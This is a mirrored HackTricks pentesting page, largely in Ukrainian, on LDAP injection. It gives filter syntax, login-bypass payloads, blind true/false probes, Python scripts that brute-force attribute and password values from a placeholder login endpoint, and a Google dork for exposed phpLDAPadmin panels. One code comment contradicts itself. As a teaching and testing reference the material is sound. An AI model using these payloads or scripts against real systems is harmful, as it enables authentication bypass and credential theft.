mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
246 lines
11 KiB
Markdown
246 lines
11 KiB
Markdown
# LDAP Injection
|
||
|
||
## LDAP Injection
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||
|
||
{% embed url="https://www.stmcyber.com/careers" %}
|
||
|
||
## LDAP Injection
|
||
|
||
### **LDAP**
|
||
|
||
**Якщо ви хочете дізнатися, що таке LDAP, перейдіть на наступну сторінку:**
|
||
|
||
{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %}
|
||
[pentesting-ldap.md](../network-services-pentesting/pentesting-ldap.md)
|
||
{% endcontent-ref %}
|
||
|
||
**LDAP Injection** - це атака, що націлена на веб-додатки, які формують LDAP-запити з введення користувача. Вона відбувається, коли додаток **не очищає належним чином** введення, що дозволяє зловмисникам **маніпулювати LDAP-запитами** через локальний проксі, що потенційно може призвести до несанкціонованого доступу або маніпуляції даними.
|
||
|
||
{% file src="../.gitbook/assets/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
|
||
|
||
**Filter** = ( filtercomp )\
|
||
**Filtercomp** = and / or / not / item\
|
||
**And** = & filterlist\
|
||
**Or** = |filterlist\
|
||
**Not** = ! filter\
|
||
**Filterlist** = 1\*filter\
|
||
**Item**= simple / present / substring\
|
||
**Simple** = attr filtertype assertionvalue\
|
||
**Filtertype** = _'=' / '\~=' / '>=' / '<='_\
|
||
**Present** = attr = \*\
|
||
**Substring** = attr ”=” \[initial] \* \[final]\
|
||
**Initial** = assertionvalue\
|
||
**Final** = assertionvalue\
|
||
**(&)** = Absolute TRUE\
|
||
**(|)** = Absolute FALSE
|
||
|
||
For example:\
|
||
`(&(!(objectClass=Impresoras))(uid=s*))`\
|
||
`(&(objectClass=user)(uid=*))`
|
||
|
||
You can access to the database, and this can content information of a lot of different types.
|
||
|
||
**OpenLDAP**: Якщо надходять 2 фільтри, виконується лише перший.\
|
||
**ADAM або Microsoft LDS**: З 2 фільтрами виникає помилка.\
|
||
**SunOne Directory Server 5.0**: Виконує обидва фільтри.
|
||
|
||
**Дуже важливо надіслати фільтр з правильною синтаксисом, інакше виникне помилка. Краще надіслати лише 1 фільтр.**
|
||
|
||
Фільтр має починатися з: `&` або `|`\
|
||
Приклад: `(&(directory=val1)(folder=public))`
|
||
|
||
`(&(objectClass=VALUE1)(type=Epson*))`\
|
||
`VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
|
||
|
||
Тоді: `(&(objectClass=`**`*)(ObjectClass=*))`** буде першим фільтром (тим, що виконується).
|
||
|
||
### Login Bypass
|
||
|
||
LDAP підтримує кілька форматів для зберігання пароля: clear, md5, smd5, sh1, sha, crypt. Тому може бути так, що незалежно від того, що ви введете в пароль, він буде захищений.
|
||
```bash
|
||
user=*
|
||
password=*
|
||
--> (&(user=*)(password=*))
|
||
# The asterisks are great in LDAPi
|
||
```
|
||
|
||
```bash
|
||
user=*)(&
|
||
password=*)(&
|
||
--> (&(user=*)(&)(password=*)(&))
|
||
```
|
||
|
||
```bash
|
||
user=*)(|(&
|
||
pass=pwd)
|
||
--> (&(user=*)(|(&)(pass=pwd))
|
||
```
|
||
|
||
```bash
|
||
user=*)(|(password=*
|
||
password=test)
|
||
--> (&(user=*)(|(password=*)(password=test))
|
||
```
|
||
|
||
```bash
|
||
user=*))%00
|
||
pass=any
|
||
--> (&(user=*))%00 --> Nothing more is executed
|
||
```
|
||
|
||
```bash
|
||
user=admin)(&)
|
||
password=pwd
|
||
--> (&(user=admin)(&))(password=pwd) #Can through an error
|
||
```
|
||
|
||
```bash
|
||
username = admin)(!(&(|
|
||
pass = any))
|
||
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
|
||
```
|
||
|
||
```bash
|
||
username=*
|
||
password=*)(&
|
||
--> (&(user=*)(password=*)(&))
|
||
```
|
||
|
||
```bash
|
||
username=admin))(|(|
|
||
password=any
|
||
--> (&(uid=admin)) (| (|) (webpassword=any))
|
||
```
|
||
#### Списки
|
||
|
||
* [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_FUZZ.txt)
|
||
* [LDAP Атрибути](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt)
|
||
* [Атрибути LDAP PosixAccount](https://tldp.org/HOWTO/archived/LDAP-Implementation-HOWTO/schemas.html)
|
||
|
||
### Сліпа LDAP Ін'єкція
|
||
|
||
Ви можете примусити отримати False або True відповіді, щоб перевірити, чи повертаються які-небудь дані, і підтвердити можливу Сліпу LDAP Ін'єкцію:
|
||
```bash
|
||
#This will result on True, so some information will be shown
|
||
Payload: *)(objectClass=*))(&objectClass=void
|
||
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
|
||
```
|
||
|
||
```bash
|
||
#This will result on True, so no information will be returned or shown
|
||
Payload: void)(objectClass=void))(&objectClass=void
|
||
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
|
||
```
|
||
#### Вивантаження даних
|
||
|
||
Ви можете ітеруватися по ASCII літерам, цифрам та символам:
|
||
```bash
|
||
(&(sn=administrator)(password=*)) : OK
|
||
(&(sn=administrator)(password=A*)) : KO
|
||
(&(sn=administrator)(password=B*)) : KO
|
||
...
|
||
(&(sn=administrator)(password=M*)) : OK
|
||
(&(sn=administrator)(password=MA*)) : KO
|
||
(&(sn=administrator)(password=MB*)) : KO
|
||
...
|
||
```
|
||
### Scripts
|
||
|
||
#### **Виявлення дійсних полів LDAP**
|
||
|
||
Об'єкти LDAP **за замовчуванням містять кілька атрибутів**, які можна використовувати для **збереження інформації**. Ви можете спробувати **брутфорсити всі з них, щоб витягти цю інформацію.** Ви можете знайти список [**атрибутів LDAP за замовчуванням тут**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP\_attributes.txt).
|
||
```python
|
||
#!/usr/bin/python3
|
||
import requests
|
||
import string
|
||
from time import sleep
|
||
import sys
|
||
|
||
proxy = { "http": "localhost:8080" }
|
||
url = "http://10.10.10.10/login.php"
|
||
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
|
||
|
||
attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
|
||
|
||
for attribute in attributes: #Extract all attributes
|
||
value = ""
|
||
finish = False
|
||
while not finish:
|
||
for char in alphabet: #In each possition test each possible printable char
|
||
query = f"*)({attribute}={value}{char}*"
|
||
data = {'login':query, 'password':'bla'}
|
||
r = requests.post(url, data=data, proxies=proxy)
|
||
sys.stdout.write(f"\r{attribute}: {value}{char}")
|
||
#sleep(0.5) #Avoid brute-force bans
|
||
if "Cannot login" in r.text:
|
||
value += str(char)
|
||
break
|
||
|
||
if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
|
||
finish = True
|
||
print()
|
||
```
|
||
#### **Спеціальний сліпий LDAP-ін'єкція (без "\*")**
|
||
```python
|
||
#!/usr/bin/python3
|
||
|
||
import requests, string
|
||
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
|
||
|
||
flag = ""
|
||
for i in range(50):
|
||
print("[i] Looking for number " + str(i))
|
||
for char in alphabet:
|
||
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
|
||
if ("TRUE CONDITION" in r.text):
|
||
flag += char
|
||
print("[+] Flag: " + flag)
|
||
break
|
||
```
|
||
### Google Dorks
|
||
```bash
|
||
intitle:"phpLDAPadmin" inurl:cmd.php
|
||
```
|
||
### Більше Пейлоадів
|
||
|
||
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
|
||
|
||
<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
Якщо вас цікавить **кар'єра в хакерстві** і ви хочете зламати незламне - **ми наймаємо!** (_вимагається вільне володіння польською мовою в письмовій та усній формі_).
|
||
|
||
{% embed url="https://www.stmcyber.com/careers" %}
|
||
|
||
{% hint style="success" %}
|
||
Вивчайте та практикуйте AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Вивчайте та практикуйте GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Підтримайте HackTricks</summary>
|
||
|
||
* Перевірте [**плани підписки**](https://github.com/sponsors/carlospolop)!
|
||
* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи Telegram**](https://t.me/peass) або **слідкуйте** за нами в **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Діліться хакерськими трюками, надсилаючи PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) та [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) репозиторіїв на GitHub.
|
||
|
||
</details>
|
||
{% endhint %}
|